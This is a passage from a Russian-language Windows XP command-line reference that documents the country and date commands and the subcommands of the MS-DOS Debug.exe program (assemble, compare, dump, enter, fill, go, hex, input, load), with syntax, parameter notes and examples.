используемый в следующих командах: backup, date и time.</p> <p>&#160; &#160; &#160; В следующей таблице перечислены форматы даты и времени для каждого кода страны. Для каждого кода страны в соответствующих колонках представлена дата 3 января 1994г. и время 17 часов 35 минут (0 секунд и 0 сотых секунды).<br />&#160; &#160; &#160; Страна/регион или язык Код страны/региона Формат даты Формат времени<br />&#160; &#160; &#160; США 001 01/03/1994 5:35:00.00p<br />&#160; &#160; &#160; Французский (Канада) 002 1994-01-03 17:35:00<br />&#160; &#160; &#160; Латинская америка 003 03/01/1994 5:35:00.00p<br />&#160; &#160; &#160; Голландия 031 03-01-94 17:35:00<br />&#160; &#160; &#160; Бельгия 032 03/01/94 17:35:00<br />&#160; &#160; &#160; Франция 033 03.01.1994 17:35:00<br />&#160; &#160; &#160; Испания 034 3/01/94 17:35:00<br />&#160; &#160; &#160; Венгрия 036 1994.01.03 17:35:00<br />&#160; &#160; &#160; Италия 039 03/01/94 17.35.00<br />&#160; &#160; &#160; Швейцария 041 03.01.94 17 35.00<br />&#160; &#160; &#160; Чешская республика 042 03.01.1994 17:35:00<br />&#160; &#160; &#160; Словакия 042 03.01.1994 17:35:00<br />&#160; &#160; &#160; Великобритания 044 03/01/94 17:35:00.00<br />&#160; &#160; &#160; Дания 045 03-01-94 17.35.00<br />&#160; &#160; &#160; Швеция 046 1994-01-03 17.35.00<br />&#160; &#160; &#160; Норвегия 047 03.01.94 17:35:00<br />&#160; &#160; &#160; Польша 048 1994-01-03 17:35:00<br />&#160; &#160; &#160; Германия 049 03.01.1994 17:35:00<br />&#160; &#160; &#160; Бразилия 055 03/01/94 17:35:00<br />&#160; &#160; &#160; Международный английский 061 03/01/1994 17:35:00.00<br />&#160; &#160; &#160; Португалия 351 03-01-1994 17:35:00<br />&#160; &#160; &#160; Финляндия 358 3.1.1994 17.35.00</p> <p>Примеры</p> <p>Чтобы преобразования валюты, времени, даты и символов в соответствии с французским национальным форматом, добавьте следующую команду в файл Config.nt:</p> <p>country=033</p> <p>Чтобы задать кодовую страницу вместе с кодом страны для Франции, введите следующую команду:</p> <p>country=033,850</p> <p>Если кодовая страница не задана, но введен параметр [диск:][путь] имя_файла, необходимо ввести запятую, предваряющую кодовую страницу, как показано в примере:</p> <p>country=033,,c:\winnt\system32\country.sys</p> <p>========================================================================================<br />Date</p> <p>Отображение текущей настройки системной даты. Выполненная без параметров команда date выводит настройку текущей системной даты и приглашение ввести новую дату.<br />Синтаксис</p> <p>date [мм-дд-гг] [/t]<br />Параметры</p> <p>дд-мм-гг<br />&#160; &#160; Установка указанной даты, где мм — месяц, дд — день, гг — год.<br />/t<br />&#160; &#160; Вывод текущей даты без приглашения ввести новую дату. <br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примечания</p> <p>&#160; &#160; * Значения параметров мм, дд и гг должны быть разделены точкой (.), знаком переноса (-) или косой чертой (/).<br />&#160; &#160; * Параметр мм может принимать значения от 1 до 12.<br />&#160; &#160; * Параметр дд может принимать значения от 1 до 31.<br />&#160; &#160; * Параметр гг может принимать значения от 80 до 99 или от 1980 до 2099.<br />&#160; &#160; * Система Windows XP автоматически изменяет текущие месяц и год в зависимости от количества дней в месяце (28, 29, 30 или 31 день).</p> <p>Примеры</p> <p>Чтобы изменить дату на 3 августа 2000г., введите одну из следующих команд:</p> <p>08.03.00</p> <p>08-03-00</p> <p>08/03/00</p> <p>Чтобы вывести текущую системную дату, введите следующую команду:</p> <p>date /t</p> <p>========================================================================================<br />Debug</p> <p>Запуск Debug.exe, программы для проверки и отладки исполнительных файлов MS-DOS. Выполненная без параметров команда debug запускает программу Debug.exe и выводит приглашение команды debug, представленное дефисом (-).<br />Синтаксис</p> <p>debug [[диск:][путь] имя_файла [параметры]]<br />Параметры</p> <p>[диск:][путь] имя_файла<br />&#160; &#160; Задание расположения и имени исполняемого файла для тестирования.<br />параметры<br />&#160; &#160; Указание параметров командной строки, передаваемых отлаживаемой программе.<br />?<br />&#160; &#160; Вывод списка подкоманд команды debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Использование команд подсистемы MS-DOS</p> <p>&#160; &#160; &#160; Команда debug — это команда подсистемы MS-DOS, которая выполняется в среде WOW/NTVDM.<br />&#160; &#160; * Разделитель параметров команды</p> <p>&#160; &#160; &#160; Параметры можно вводить через запятые или пробелы, но это требуется только для шестнадцатеричных значений. Например, следующие команды эквивалентны:</p> <p>&#160; &#160; &#160; dcs:100 110</p> <p>&#160; &#160; &#160; d cs:100 110</p> <p>&#160; &#160; &#160; d,cs:100,110<br />&#160; &#160; * Использование команд debug</p> <p>&#160; &#160; &#160; Существует несколько команд debug, которыми можно воспользоваться. Дополнительные сведения о командах debug см. по ссылке «».</p> <p>========================================================================================<br />Debug: a (assemble)</p> <p>Создание двоичного кода процессоров 8086/8087/8088 непосредственно в памяти. Выполненная без параметров команда a начинает работу с точки последнего останова.<br />Синтаксис</p> <p>a [адрес]<br />Параметры</p> <p>адрес<br />&#160; &#160; Задает адрес, по которому записаны инструкции на языке ассемблер. Параметр адрес принимает шестнадцатеричные значения без знака h.<br />?<br />&#160; &#160; Вывод списка команд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр можно пропустить. По умолчанию для команд debug a, g, l, t, u и w адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. Все числовые значения при этом представлены в шестнадцатеричном формате. Между именем сегмента и значением смещения следует вставлять двоеточие. Примеры правильных адресов:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Задание мнемоник префикса</p> <p>&#160; &#160; &#160; Задайте мнемонику префикса инструкции перед кодом операции (т. е. opcode), к которой она относится. Команда a создает исполняемый машинный код из инструкций на языке ассемблера. Все числовые значения должны быть представлены в шестнадцатеричном формате и записаны как набор от 1 до 4 символов.<br />&#160; &#160; * Использование мнемоник</p> <p>&#160; &#160; &#160; Мнемоники cs:, ds:, es: и ss:. Мнемоникой, вызывающей возврат управления в другой сегмент кода (far return), является retf. Мнемоники для работы со строками должны точно определять размер элементов строк. Например, для перемещения строк из слов (16 бит) следует использовать movsw, а для перемещения строк из байтов (8 бит) следует использовать movsb.<br />&#160; &#160; * Задание переходов и вызовы функций</p> <p>&#160; &#160; &#160; Ассемблер автоматически обрабатывает переходы и вызовы (т. е. префиксы short, near или far ) в зависимости от смещения байтов. Имеется возможность переопределить переходы или вызовы с помощью префиксов near или far. Например:</p> <p>&#160; &#160; &#160; -a0100:0500<br />&#160; &#160; &#160; 0100:0500 jmp 502 ; короткий (short) переход на 2 байта<br />&#160; &#160; &#160; 0100:0502 jmp near 505 ; ближний (near) переход на 3 байта<br />&#160; &#160; &#160; 0100:0505 jmp far 50a ; длинный (far) переход на 5 байтов</p> <p>&#160; &#160; &#160; Вместо префикса near можно использовать сокращение ne.<br />&#160; &#160; * Задание адреса слова или байта в памяти</p> <p>&#160; &#160; &#160; Если операнды ссылаются на адреса слов или байтов в памяти, тип данных должен быть задан с использованием префикса word ptr или byte ptr, которые можно сократить до wo для word ptr и до by для byte ptr. Например:</p> <p>&#160; &#160; &#160; dec wo [si]<br />&#160; &#160; &#160; neg byte ptr [128]<br />&#160; &#160; * Задание операндов</p> <p>&#160; &#160; &#160; В программе Debug.exe используется общее соглашение о том, что операнды, указывающие на адрес в памяти, заключаются в квадратные скобки ([ ]). Это единственный способ, который позволяет различать непосредственные операнды и ссылки на области в памяти в Debug.exe. Например:</p> <p>&#160; &#160; &#160; mov ax,21 ; загрузить число 21h в регистр AX<br />&#160; &#160; &#160; mov ax,[21] ; загрузить содержимое<br />&#160; &#160; &#160; ; памяти по адресу 21h<br />&#160; &#160; &#160; ; в регистр AX<br />&#160; &#160; * Псевдоинструкции</p> <p>&#160; &#160; &#160; С командой a часто используются две псевдоинструкции: операция db, которая размещает байты непосредственно в памяти, и операция dw, которая размещает в памяти слова. Например:</p> <p>&#160; &#160; &#160; db 1,2,3,4,&quot;ЭТО ПРИМЕР&quot;<br />&#160; &#160; &#160; db 'ЭТО КАВЫЧКА: &quot;'<br />&#160; &#160; &#160; db &quot;ЭТО КАВЫЧКА: '&quot;<br />&#160; &#160; &#160; dw 1000,2000,3000,&quot;BACH&quot;<br />&#160; &#160; * Ввод данных в определенные байты</p> <p>&#160; &#160; &#160; Дополнительные сведения о вводе данных в определенные байты с помощью команды e (enter) см. по ссылке «».<br />&#160; &#160; * Деассемблирование байт</p> <p>&#160; &#160; &#160; Дополнительные сведения о деассемблировании байт с помощью команды u (unassemble) см. по ссылке «».</p> <p>Примеры</p> <p>Команда a допускает различное использование ссылок на регистры. Например:</p> <p>add bx,34[bp+2].[si-1]<br />pop [bp+di]<br />push [si] )</p> <p>Кроме того, команда a поддерживает использование синонимов дополнительных кодов операций: Например:</p> <p>loopz 100<br />loope 100<br />ja 200<br />jnbe 200</p> <p>Для дополнительных кодов операций процессора 8087 необходимо задать префиксы wait или fwait. Например:</p> <p>fwait fadd st,st(3) ; эта строка вставляет<br />; в код префикса fwait</p> <p>========================================================================================<br />Debug: c (compare)</p> <p>Сравнение двух блоков памяти.<br />Синтаксис</p> <p>c диапазон адрес<br />Параметры</p> <p>диапазон<br />&#160; &#160; Обязательный параметр. Задание начального и конечного адреса или начального адресы и длины первой области в памяти для сравнения.<br />адрес<br />&#160; &#160; Обязательный параметр. Задание начального адреса второй области памяти для сравнения.<br />?<br />&#160; &#160; Вывод списка команд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей диапазона</p> <p>&#160; &#160; &#160; Параметр диапазон используется в командах debug для задания диапазона памяти. Для задания диапазона можно использовать один из следующих форматов: начальный и конечный адрес или начальный адрес и длина (разделяются символом l) диапазона. Например, обе следующих команды задают 16-разрядный диапазон, начинающийся с адреса CS:100:</p> <p>&#160; &#160; &#160; cs:100 10f</p> <p>&#160; &#160; &#160; cs:100 l 10<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр могут быть пропущены. По умолчанию для команд debug a, g, l, t, u и w адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. Все числовые значения при этом представлены в шестнадцатеричном формате. Между именем сегмента и значением смещения следует вставлять двоеточие. Следующие адреса являются допустимыми:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Если параметры диапазон и адрес совпадают, команда c ничего не выводит и возвращается к приглашению debug. Если при сравнении блоков памяти обнаружены различия, они выводятся командой c в следующем виде:</p> <p>&#160; &#160; &#160; адрес1 байт1 байт2 адрес2</p> <p>Примеры</p> <p>Чтобы сравнить блок памяти от 100h до 10Fh с блоком памяти от 300h до 30Fh, введите следующую команду:</p> <p>c100,10f 300</p> <p>или</p> <p>c100l10 300</p> <p>Обе эти команды выведут следующие данные (предполагается, что DS = 197F):</p> <p>197F:0100 4D E4 197F:0300<br />197F:0101 67 99 197F:0301<br />197F:0102 A3 27 197F:0302<br />197F:0103 35 F3 197F:0303<br />197F:0104 97 BD 197F:0304<br />197F:0105 04 35 197F:0305<br />197F:0107 76 71 197F:0307<br />197F:0108 E6 11 197F:0308<br />197F:0109 19 2C 197F:0309<br />197F:010A 80 0A 197F:030A<br />197F:010B 36 7F 197F:030B<br />197F:010C BE 22 197F:030C<br />197F:010D 83 93 197F:030D<br />197F:010E 49 77 197F:030E<br />197F:010F 4F 8A 197F:030F</p> <p>Адреса 197F:0106 и 197F:0306 отсутствуют в списке. Это означает, что значения, расположенные по этим адресам, совпадают.</p> <p>========================================================================================<br />Debug: d (dump)</p> <p>Просмотр содержимого заданного диапазона адресов памяти. Выполненная без параметров команда d выводит на экран содержимое 128 байт, начиная с конца диапазона адресов, заданного в предыдущей команде d.<br />Синтаксис</p> <p>d [диапазон]<br />Параметры</p> <p>диапазон<br />&#160; &#160; Задание начального и конечного адреса или начального адреса и длины блока памяти для просмотра его содержимого.<br />?<br />&#160; &#160; Вывод списка команд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей диапазона</p> <p>&#160; &#160; &#160; Параметр диапазон используется в подкомандах debug для задания диапазона памяти. Параметр диапазон можно задать в одном из следующих форматов: начальный адрес и конечный адрес или начальный адрес и длина (обозначаемая l) диапазона. Например, оба следующих выражения задают диапазон из 16 байтов, начинающийся с адреса CS:100:</p> <p>&#160; &#160; &#160; cs:100 10f</p> <p>&#160; &#160; &#160; cs:100 l 10<br />&#160; &#160; * Если используется подкоманда d, содержимое памяти выводится командой Debug.exe двумя частями: шестнадцатеричной (каждый байт представлен в шестнадцатеричном формате) и текстовой (каждый байт представлен символом ASCII). Непечатаемые символы отображаются точкой (.) в текстовой части. Каждая строка на экране представляет содержимое 16 байт со знаком тире между восьмым и девятым байтом. Все строки начинаются на 16-ти байтной границе.<br />&#160; &#160; * Сведения об отображении содержимого регистров с помощью подкоманды r (register) см. по ссылке «».</p> <p>Примеры</p> <p>Введите следующую команду:</p> <p>dcs:100 10f</p> <p>Команда debug.exe выводит содержимое диапазона в следующем формате:</p> <p>04BA:0100 54 4F 4D 00 53 41 57 59-45 52 00 00 00 00 00 00.....</p> <p>Команда Debug.exe выводит сведения в таком формате, если подкоманда d выполнена без параметров. Каждая строка на экране начинается с адреса, который отстоит от адреса предыдущей строки на 16 байт (или на 8 байт для экрана с 40 колонками). Для каждой последующей подкоманды d, вводимой без параметров, Debug.exe выводит следующую часть сведений непосредственно за предыдущей.</p> <p>Чтобы вывести содержимое 20h байт, начиная с CS:100, введите следующую команду:</p> <p>dcs:100 l 20</p> <p>Чтобы вывести содержимое всех байт в диапазоне от 100h до 115h в сегменте CS, введите следующую команду:</p> <p>dcs:100 115</p> <p>========================================================================================<br />Debug: e (enter)</p> <p>Ввод данных в память по заданному адресу.<br />Синтаксис</p> <p>e адрес [список]<br />Параметры</p> <p>адрес<br />&#160; &#160; Обязательный параметр. Адрес начала области памяти для ввода данных.<br />список<br />&#160; &#160; Задание списка байтов, которые требуется ввести в память.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр могут быть пропущены. По умолчанию для подкоманд a, g, l, t, u и w команды debug адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. Все числовые значения при этом представлены в шестнадцатеричном формате. Между именем сегмента и значением смещения следует вставлять двоеточие. Следующие адреса являются допустимыми:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Использование параметра адрес</p> <p>&#160; &#160; &#160; При задании параметра адрес без указания параметра список Debug.exe выведет на экран адрес и его содержимое, затем повторит адрес на следующей строке и будет ждать ввода новой команды. В этот момент можно выполнить одно из следующих действий.<br />&#160; &#160; &#160; &#160; &#160; o Заменить байт данных. Для этого введите новое значение. Если введенное значение не является допустимым шестнадцатеричным числом или содержит более двух цифр, Debug.exe не выводит на экран неверные или избыточные символы.<br />&#160; &#160; &#160; &#160; &#160; o Перейти к следующему байту. Для этого нажмите клавишу ПРОБЕЛ. Для изменения данного байта введите новое значение после текущего. Если при нажатии клавиши ПРОБЕЛ пройдена 8-байтная граница, Debug.exe выводит на экран новую строку с новым адресом в начале строки.<br />&#160; &#160; &#160; &#160; &#160; o Возвратиться к предыдущему байту. Для этого нажмите клавишу МИНУС. Для перемещения назад более чем на один байт нажмите эту клавишу несколько раз. При нажатии клавиши МИНУС Debug.exe выводит новую строку с текущим адресом и значением.<br />&#160; &#160; &#160; &#160; &#160; o Остановить выполнение подкоманды e. Для этого нажмите клавишу ENTER. Это можно сделать в любой позиции курсора.<br />&#160; &#160; * Использование параметра список</p> <p>&#160; &#160; &#160; Если введен параметр список, подкоманда e последовательно заменяет существующие значения значениями из списка. При возникновении ошибки никакие значения не будут изменены.</p> <p>&#160; &#160; &#160; Список может быть задан как шестнадцатеричными числами, так и строкой. При этом числа разделяются пробелами, запятыми или символами табуляции. Строки необходимо заключать в апострофы (т. е. 'строка') или кавычки (т. е. &quot;строка&quot;).<br />&#160; &#160; * Создание двоичного кода</p> <p>&#160; &#160; &#160; Сведения о создании двоичного кода с помощью подкоманды a (assemble) см. по ссылке «».<br />&#160; &#160; * Просмотр содержимого области памяти</p> <p>&#160; &#160; &#160; Сведения о просмотре содержимого области памяти с помощью подкоманды d (dump) см. по ссылке «».</p> <p>Примеры</p> <p>Введите следующую команду:</p> <p>ecs:100</p> <p>Debug.exe выведет содержимое первого байта в следующем формате:</p> <p>04BA:0100 EB._</p> <p>Чтобы заменить это значение числом 41, введите 41 в позицию курсора, как показано ниже:</p> <p>04BA:0100 EB.41_</p> <p>Последовательность байтов можно ввести в одной подкоманде e. Вместо нажатия клавиши ENTER после нового значения, нажмите клавишу ПРОБЕЛ. Программа Debug.exe выведет следующее значение. В данном примере, если клавиша ПРОБЕЛ нажата три раза, Debug.exe выведет на экран следующие значения:</p> <p>04BA:0100 EB.41 10. 00. BC._</p> <p>Чтобы заменить шестнадцатеричное значение BC числом 42, введите 42 в позицию курсора, как показано ниже:</p> <p>04BA:0100 EB.41 10. 00. BC.42_</p> <p>Чтобы изменить значение 10 на 6F, дважды нажмите клавишу МИНУС для возврата к адресу 0101 (значение 10). Программа Debug.exe выводит следующие сведения:</p> <p>04BA:0100 EB.41 10. 00. BC.42-<br />04BA:0102 00.-<br />04BA:0101 10._</p> <p>Введите 6F в позицию курсора для изменения значения, как показано ниже:</p> <p>04BA:0101 10.6F_</p> <p>Нажмите клавишу ENTER для завершения выполнения подкоманды e и возврата к приглашению программы debug.</p> <p>Рассмотрим пример ввода строковой величины:</p> <p>eds:100 &quot;Это пример текста&quot;</p> <p>Эта строка будет занимать 24 байта, начиная с адреса DS:100.</p> <p>========================================================================================<br />Debug: f (fill)</p> <p>Заполнение адресов в определенной области памяти заданными значениями.<br />Синтаксис</p> <p>f диапазон список<br />Параметры</p> <p>диапазон<br />&#160; &#160; Обязательный параметр. Задание начального и конечного адреса или начального адреса и длины области памяти, которую требуется заполнить.<br />список<br />&#160; &#160; Обязательный параметр. Задание данных, которые требуется ввести.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей диапазона</p> <p>&#160; &#160; &#160; Параметр диапазон используется в подкомандах debug для задания диапазона памяти. Параметр диапазон можно задать в одном из следующих форматов: начальный адрес и конечный адрес или начальный адрес и длина (обозначаемая l) диапазона. Например, оба следующих выражения задают диапазон из 16 байтов, начинающийся с адреса CS:100:</p> <p>&#160; &#160; &#160; cs:100 10f</p> <p>&#160; &#160; &#160; cs:100 l 10<br />&#160; &#160; * Задание данных</p> <p>&#160; &#160; &#160; Данные можно задать в шестнадцатеричном или текстовом формате. Данные, ранее находившиеся по данному адресу, будут удалены.<br />&#160; &#160; * Использование параметра список</p> <p>&#160; &#160; &#160; Список может состоять из шестнадцатеричных чисел или строки, заключенной в кавычки (т. е. &quot;строка&quot;).</p> <p>Примеры</p> <p>Чтобы заполнить область памяти с 04BA:100 по 04BA:1FF пятью определенными значениями (например 42, 45, 52, 54, 41) и повторять этот набор, пока 100h байт не будут заполнены программой Debug.exe, введите следующую команду:</p> <p>f04ba:100l100 42 45 52 54 41</p> <p>========================================================================================<br />Debug: g (go)</p> <p>Выполнение загруженной программы. Запущенная без параметров подкоманда g начинает выполнение с текущего адреса в реестрах CS:IP.<br />Синтаксис</p> <p>g [=адрес] [точки_останова]<br />Параметры</p> <p>адрес<br />&#160; &#160; Задание адреса в памяти, с которого требуется начать выполнение программы. <br />точки_останова<br />&#160; &#160; Указание до 10 временных точек останова, которые могут быть заданы как часть подкоманды g.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр могут быть пропущены. По умолчанию для подкоманд a, g, l, t, u и w команды debug адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. Все числовые значения при этом представлены в шестнадцатеричном формате. Между именем сегмента и значением смещения следует вставлять двоеточие. Следующие адреса являются допустимыми:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Использование параметра адрес</p> <p>&#160; &#160; &#160; Введите знак равенства (=) перед параметром адрес, чтобы отличить адрес от адресов точек останова (точки_останова).<br />&#160; &#160; * Задание точек останова</p> <p>&#160; &#160; &#160; Выполнение программы будет остановлено в первой встретившейся точке останова, независимо от расположения этой точки останова в списке параметра точки_останова. Debug.exe заменяет код, находящийся в точках останова, на инструкции прерывания.</p> <p>&#160; &#160; &#160; Когда выполнение программы дошло до точки останова, Debug.exe восстанавливает код в точках останова и выводит на экран содержимое всех регистров, все флаги состояния и деассемблированную инструкцию, которая была выполнена последней. Debug.exe выводит те же сведения, которые получают при использовании полкоманды r (регистр) и указании адреса данной точки останова.</p> <p>&#160; &#160; &#160; Если программа не остановлена ни в одной точке, Debug.exe не заменяет коды прерываний первоначальными инструкциями.</p> <p>&#160; &#160; &#160; Точки останова могут быть установлены только по адресам, содержащим первый байт кода операции 8086 (opcode). Если установлено больше 10 точек останова, выводится следующее сообщение:</p> <p>&#160; &#160; &#160; bp Error<br />&#160; &#160; * Использование указателя на стек, задаваемый пользователем</p> <p>&#160; &#160; &#160; Указатель на стек, задаваемый пользователем, должен быть допустимым, а емкость стека должна быть не менее 6 байт для подкоманды g. Для перехода к тестируемой программе в подкоманде g используется инструкция iret. Debug.exe устанавливает указатель на стек пользователя, помещает туда пользовательские флаги состояния, значение регистра кодового сегмента и указатель на текущую команду. (Если заданный пользователем стек неверен или имеет недостаточный объем, возможен сбой в операционной системе). Debug.exe записывает код прерывания (т. е. 0CCh) в указанные точки останова или адреса.<br />&#160; &#160; * Перезапуск программы</p> <p>&#160; &#160; &#160; Не перезапускайте программу при получении следующего сообщения:</p> <p>&#160; &#160; &#160; Program terminated normally</p> <p>&#160; &#160; &#160; Чтобы правильно запустить программу, перезагрузите ее с помощью подкоманд n (name) и l (load).<br />&#160; &#160; * Для получения дополнительных сведений о выполнении циклов, строковых инструкций, программных прерываний и процедур с помощью подкоманды p (proceed) щелкните ссылку «».<br />&#160; &#160; * Сведения о выполнении одной инструкции с помощью подкоманды t (trace) см. по ссылке «».</p> <p>Примеры</p> <p>Чтобы запустить текущую программу и выполнить ее до точки останова по адресу 7550 в сегменте CS, введите следующую команду.</p> <p>gcs:7550</p> <p>Debug.exe выведет на экран содержимое регистров и состояние флагов, а затем остановит подкоманду g.</p> <p>Чтобы установить две точки останова, введите следующую команду:</p> <p>gcs:7550, cs:8000</p> <p>Если подкоманда g введена снова после остановки в точке останова, выполнение начнется с инструкции, следующей за точкой останова, а не с обычного адреса начала программы.</p> <p>========================================================================================<br />Debug: h (hexadecimal)</p> <p>Выполнение шестнадцатеричных арифметических операций над двумя заданными числами.<br />Синтаксис</p> <p>h число1 число2<br />Параметры</p> <p>число1<br />&#160; &#160; Обязательный параметр. Первое шестнадцатеричное число в диапазоне от 0 до FFFFh.<br />число2<br />&#160; &#160; Обязательный параметр. Второе шестнадцатеричное число в диапазоне от 0 до FFFFh.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Заметки</p> <p>&#160; &#160; *<br />&#160; &#160; * В программе Debug.exe два введенных числа складываются, а затем вычисляется их разность. Результаты вычислений выводятся в одной строке — вначале сумма, затем разность.</p> <p>Примеры</p> <p>Введите следующую команду:</p> <p>h19f 10a</p> <p>Результаты вычислений Debug.exe будут выведены в виде:</p> <p>02A9 0095</p> <p>========================================================================================<br />Debug: i (input)</p> <p>Считывание и вывод на экран одного байта из указанного порта ввода.<br />Синтаксис</p> <p>i порт<br />Параметры</p> <p>порт<br />&#160; &#160; Обязательный параметр. Задание порта ввода адресом. Адрес может быть 16-битным значением.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Заметки</p> <p>&#160; &#160; *<br />&#160; &#160; * Сведения об отправке байта в порт вывода с помощью подкоманды o (output) см. по ссылке «».</p> <p>Примеры</p> <p>Введите следующую команду:</p> <p>i2f8</p> <p>Если находящаяся в порту величина равна 42h, Debug.exe считает ее и выведет в следующем виде:</p> <p>42</p> <p>========================================================================================<br />Debug: l (load)</p> <p>Загрузка файла или содержимого сектора диска в память. Выполненная без параметров подкоманда l загружает файл, указанный в командной строке программы debug, в память, начиная с адреса CS:100. В регистрах BX и CX указывается количество загруженных байт. Если имя файла не было задано в командной строке debug, используется файл, ранее заданный при вызове последней подкоманды n.<br />Синтаксис</p> <p>l [адрес]</p> <p>l [адрес] [диск] [первый_сектор] [число]<br />Параметры</p> <p>адрес<br />&#160; &#160; Задание адреса области памяти, в которую требуется загрузить содержимое файла или сектора. Если параметр адрес не задан, используется текущий адрес в регистре CS. <br />диск<br />&#160; &#160; Задание накопителя, содержащего диск, с которого считываются определенные сектора. Данный параметр задается числом: 0 = A, 1 = B, 2 = C и т. д. <br />первый_сектор<br />&#160; &#160; Задание шестнадцатеричного номера первого сектора, содержимое которого требуется загрузить.<br />число<br />&#160; &#160; Задание шестнадцатеричного числа последовательных секторов, содержимое которых требуется загрузить. Параметры диск, первый_сектор и число используются только в том случае, когда необходимо загрузить содержимое определенных секторов, а не файл, указанный в командной строке debug или в последней подкоманде n (name).<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Заметки</p> <p>&#160; &#160; *<br />&#160; &#160; * Для загрузки задаваемого регистрами BX:CX числа байтов из файла на диске используется следующий синтаксис:</p> <p>&#160; &#160; &#160; l [адрес]<br />&#160; &#160; * Для пропуска файловой системы и прямой загрузки указанных секторов используется следующий синтаксис:</p> <p>&#160; &#160; &#160; l [адрес] [диск] [первый_сектор] [число]<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр могут быть пропущены. По умолчанию для подкоманд a, g, l, t, u и w команды debug адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. All numeric values are in hexadecimal format. Между именем сегмента и значением смещения следует вставлять двоеточие. Следующие адреса являются допустимыми:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Использование параметра адрес</p> <p>&#160; &#160; &#160; При вызове подкоманды l с указанием параметра адрес Debug.exe загрузит файл или содержимое сектора диска в область памяти, начиная с адреса.<br />&#160; &#160; * Использование всех параметров</p> <p>&#160; &#160; &#160; При вызове подкоманды l со всеми параметрами Debug.exe загружает содержимое сектора диска, а не файла.<br />&#160; &#160; * Загрузка содержимого сектора диска</p> <p>&#160; &#160; &#160; Каждый сектор в указанном диапазоне считывается с диска, заданного параметром диск. Debug.exe начинает загрузку с первого_сектора и последовательно загружает сектора в память, пока не будет загружено заданное число секторов.<br />&#160; &#160; * Загрузка файла .exe</p> <p>&#160; &#160; &#160; Для файлов с расширением .exe параметр адрес игнорируется. В этом случае Debug.exe использует загрузочный адрес, задаваемый в заголовке .exe файла. При загрузке заголовок отделяется от самого .exe файла, загружаемого в память, поэтому размер файла, указанный в заголовке, и фактически занимаемый размер в памяти будут различаться. Для просмотра .exe файла целиком он может быть переименован в файл с другим расширением и затем просмотрен в программе Debug.<br />&#160; &#160; * Загрузка файлов .hex</p> <p>&#160; &#160; &#160; В программе Debug.exe файлы с расширением .hex распознаются как файлы в шестнадцатеричном формате. Подкоманду l можно запустить без параметров для загрузки такого шестнадцатеричного файла, начиная с адреса, указанного в данном файле. Если подкоманда l запущена с параметром адрес, начальная точка загрузки определяется как сумма заданного адреса и адреса, содержащегося в шестнадцатеричном файле.<br />&#160; &#160; * Сведения об указании файла с помощью подкоманды n (name) см. по ссылке «».<br />&#160; &#160; * Сведения о записи отлаживаемого файла на диск с помощью подкоманды w (write) см. по ссылке «».</p> <p>Примеры</p> <p>В командной строке введите:</p> <p>debug</p> <p>Введите следующую команду:</p> <p>nfile.com</p> <p>Чтобы загрузить файл File.com, введите следующую команду:</p> <p>l</p> <p>Debug.exe загружает этот файл и выводит приглашение debug.</p> <p>Чтобы загрузить содержимое 109 (6Dh) секторов диска C, начиная с логического сектора 15 (0Fh), в область памяти, начиная с адреса 04BA:0100, введите следующую команду:</p> <p>l04ba:100 2 0f 6d</p> <p>========================================================================================<br />Debug: m (move)</p> <p>Копирование содержимого одного блока памяти в другой.<br />Синтаксис</p> <p>m диапазон адрес<br />Параметры</p> <p>диапазон<br />&#160; &#160; Обязательный параметр. Задание начального и конечного адреса или начального адреса и длины области памяти, содержимое которой требуется скопировать.<br />адрес<br />&#160; &#160; Обязательный параметр. Задание начального адреса области памяти, в которую требуется скопировать содержимое диапазона.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Примечания</p> 